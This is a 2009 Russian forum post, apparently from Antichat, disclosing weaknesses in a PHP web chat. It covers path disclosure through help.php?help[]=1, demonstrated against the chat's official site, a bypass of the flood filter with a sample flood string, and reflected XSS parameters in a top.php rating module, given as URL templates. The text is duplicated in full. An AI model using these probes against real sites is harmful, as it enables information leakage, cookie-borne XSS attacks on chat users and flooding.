KIR@PRO
13.04.2009, 17:06
№1 для кого пишется? и другое что стоит сказать
для всех кому интересно, но кто не мог сам этого найти.
не надейтесь увидеть Здесь нечто типа php/sql-inject!
Здесь скорее уязвимости для того чтоб приколоться над злыми админами или своими друзьями... ;)
№2 степень опасности
низкая...
итак поехали... раскрытие пути
имя скрипта:help.php (доступен всем и присутвует практически везде где есть сам чат)
вот уязвимый кусок кода
.....
if (!isset($help)) $help=0;
$help+=0;
switch ($help) {
case 1:
.....
как известно switch не работает с массивами ... а тип переменной $help ни где не проверяется.
По этому нам всего лишь стоит обратится к скрипту с параметром ?help[]=1
как скрипт тутже выдаст нам ошибку ...
Как пример этой уязвимости подвержен официальный сайт чата _http://chat.php.spb.ru/
http://chat.php.spb.ru/www/help.php?help[]=1
<<< вернуться назад | на главную страницу
Fatal error: Unsupported operand types in C:\Inetpub\site\cpsr\www\www\help.php on line 12
p.s. думаю каждый из нас знает что нам может дать раскрытие пути... здесь мы видим что на
официальном сайте чата стоит Windows хз какой??? Вероятнее всего Server 2003/2008
(логичнее было поставить его, но то что там работает apache а не iis немного толкает
на мысль что там может мыть и XP)) , и видим что это не хостинг =)
... ну еще как вариант это может быть vps/vds
Флуд
Как известно в чате есть защита от флуда/мата.
он реагирует на повторение более 4 раз (зависит менял ли настройки админ) одного и тогоже символа...
но тут мы получаем возможность флуда, повторяя не один символ а два и более разных символов типа:
[13:48] <KIR@PRO> %87%87%87%87%87%87%%87%87%87%87%87%87%%87%87%87%87 %87%87%%87%87%87%87%87%87%%87%87%87%87%87%87%%87%8 7%87%87%87%87%%87%87%87%87%87%87%%87%87%87%87%87%8 7%%87%87%87%87%87%87%%87%87%87%87%87%87%%87%87%87% 87%87%87%%87%87%87%87%87%87%%87%87%87%87%87%87%%87 %87%87%87%87%87%%87%87%87%87%87%87%%87%87%87%87%87 %87%%87%87%87%87%87%87%%87%87%87%87%87%87%%87%87%8 7%87%87%87%%87%87%87%87%87%87%%87%87%87%87%87%87%% 87%87%87%87%87%87%%87%87%87%87%87%87%%87%87%87%87% 87%87%%87%87%87%87%87%87%%87%87%87%87%87%87%%87%87 %87%87%87%87%%87%87%87%87%87%87%%87%87%87%87%87%87 %%87%87%87%87%87%87%%87%87%87%87%87%87%%87%87%87%8 7%87%87%%87%87%87%87%87%87%%87%87%87%87%87%87%%87% 87%87%87%87%87%%87%87%87%87%87%87%%87%87%87%87%87% 87%%87%87%87%87%87%87%%87%87%87%87%87%87%%87%87%87 %87%87%87%%87%87%87%87%87%87%%87%87%87%87%87%87%%8 7%87%87%87%87%87%%87%87%87%87%87%87%%87%87%87%87%8 7%87%%87%87%87%87%87%87%%87%87%87%87%87%87%%87%87% 87%87%87%87%%87%87%87%87%87%87%%87%87%87%87%87%87% %87%87%87%87%87%87%%87%87%87%87%87%87%%87%87%87%87
так же и повторяя слова и другое....
количество вводимых знаков ограничено 1001 символом, но кому надо тот
решит эту проблемму.
Идем далее pXSS
Не надейтесь что это xss в самом чате =( к сожалению все ксс которые только можно было найти, нашли и залатали.
уязвимость присутствует в модуле рейтинга пользователей.
скачать модуль: http://nik-chat.net/downloads/top.rar
Уязвимые параметры c3, top_title, top_td_title (дополнено)
top.php?c=topshow&c2=priv&c3={XSS} // если не хотите выводить ничего то перед XSS поставте 0 - небудет выведено ни одной записи
top.php?c=topshow&top_title={XSS_1}&top_td_title={XSS_2}
Вообще C3 не фильтруется ни при одном из зарание заданных c2.
Важно будет сказать: не забывайте что это xss работает только если пользователь
переходящий по ссылке находится в чате (в браузере есть активные куки чата) в противном
случае данные фильтруются и пересылаются пост запросом... вот...)
обычно скрипт top.php находится в папке с самим чатом но некоторые
админы могут его и перенести в какое либо другое место =)
№4 END.
ну вот вобщем то и все) пользуйтесь но не злоупотребляйте....
все материалы выложены исключительно для ознакомления! (так надо :D);
© KIR@PRO + Спец для Antichat.ru
дополнено 14.04.2009
для всех кому интересно, но кто не мог сам этого найти.
не надейтесь увидеть Здесь нечто типа php/sql-inject!
Здесь скорее уязвимости для того чтоб приколоться над злыми админами или своими друзьями... ;)
№2 степень опасности
низкая...
итак поехали... раскрытие пути
имя скрипта:help.php (доступен всем и присутвует практически везде где есть сам чат)
вот уязвимый кусок кода
.....
if (!isset($help)) $help=0;
$help+=0;
switch ($help) {
case 1:
.....
как известно switch не работает с массивами ... а тип переменной $help ни где не проверяется.
По этому нам всего лишь стоит обратится к скрипту с параметром ?help[]=1
как скрипт тутже выдаст нам ошибку ...
Как пример этой уязвимости подвержен официальный сайт чата _http://chat.php.spb.ru/
http://chat.php.spb.ru/www/help.php?help[]=1
<<< вернуться назад | на главную страницу
Fatal error: Unsupported operand types in C:\Inetpub\site\cpsr\www\www\help.php on line 12
p.s. думаю каждый из нас знает что нам может дать раскрытие пути... здесь мы видим что на
официальном сайте чата стоит Windows хз какой??? Вероятнее всего Server 2003/2008
(логичнее было поставить его, но то что там работает apache а не iis немного толкает
на мысль что там может мыть и XP)) , и видим что это не хостинг =)
... ну еще как вариант это может быть vps/vds
Флуд
Как известно в чате есть защита от флуда/мата.
он реагирует на повторение более 4 раз (зависит менял ли настройки админ) одного и тогоже символа...
но тут мы получаем возможность флуда, повторяя не один символ а два и более разных символов типа:
[13:48] <KIR@PRO> %87%87%87%87%87%87%%87%87%87%87%87%87%%87%87%87%87 %87%87%%87%87%87%87%87%87%%87%87%87%87%87%87%%87%8 7%87%87%87%87%%87%87%87%87%87%87%%87%87%87%87%87%8 7%%87%87%87%87%87%87%%87%87%87%87%87%87%%87%87%87% 87%87%87%%87%87%87%87%87%87%%87%87%87%87%87%87%%87 %87%87%87%87%87%%87%87%87%87%87%87%%87%87%87%87%87 %87%%87%87%87%87%87%87%%87%87%87%87%87%87%%87%87%8 7%87%87%87%%87%87%87%87%87%87%%87%87%87%87%87%87%% 87%87%87%87%87%87%%87%87%87%87%87%87%%87%87%87%87% 87%87%%87%87%87%87%87%87%%87%87%87%87%87%87%%87%87 %87%87%87%87%%87%87%87%87%87%87%%87%87%87%87%87%87 %%87%87%87%87%87%87%%87%87%87%87%87%87%%87%87%87%8 7%87%87%%87%87%87%87%87%87%%87%87%87%87%87%87%%87% 87%87%87%87%87%%87%87%87%87%87%87%%87%87%87%87%87% 87%%87%87%87%87%87%87%%87%87%87%87%87%87%%87%87%87 %87%87%87%%87%87%87%87%87%87%%87%87%87%87%87%87%%8 7%87%87%87%87%87%%87%87%87%87%87%87%%87%87%87%87%8 7%87%%87%87%87%87%87%87%%87%87%87%87%87%87%%87%87% 87%87%87%87%%87%87%87%87%87%87%%87%87%87%87%87%87% %87%87%87%87%87%87%%87%87%87%87%87%87%%87%87%87%87
так же и повторяя слова и другое....
количество вводимых знаков ограничено 1001 символом, но кому надо тот
решит эту проблемму.
Идем далее pXSS
Не надейтесь что это xss в самом чате =( к сожалению все ксс которые только можно было найти, нашли и залатали.
уязвимость присутствует в модуле рейтинга пользователей.
скачать модуль: http://nik-chat.net/downloads/top.rar
Уязвимые параметры c3, top_title, top_td_title (дополнено)
top.php?c=topshow&c2=priv&c3={XSS} // если не хотите выводить ничего то перед XSS поставте 0 - небудет выведено ни одной записи
top.php?c=topshow&top_title={XSS_1}&top_td_title={XSS_2}
Вообще C3 не фильтруется ни при одном из зарание заданных c2.
Важно будет сказать: не забывайте что это xss работает только если пользователь
переходящий по ссылке находится в чате (в браузере есть активные куки чата) в противном
случае данные фильтруются и пересылаются пост запросом... вот...)
обычно скрипт top.php находится в папке с самим чатом но некоторые
админы могут его и перенести в какое либо другое место =)
№4 END.
ну вот вобщем то и все) пользуйтесь но не злоупотребляйте....
все материалы выложены исключительно для ознакомления! (так надо :D);
© KIR@PRO + Спец для Antichat.ru
дополнено 14.04.2009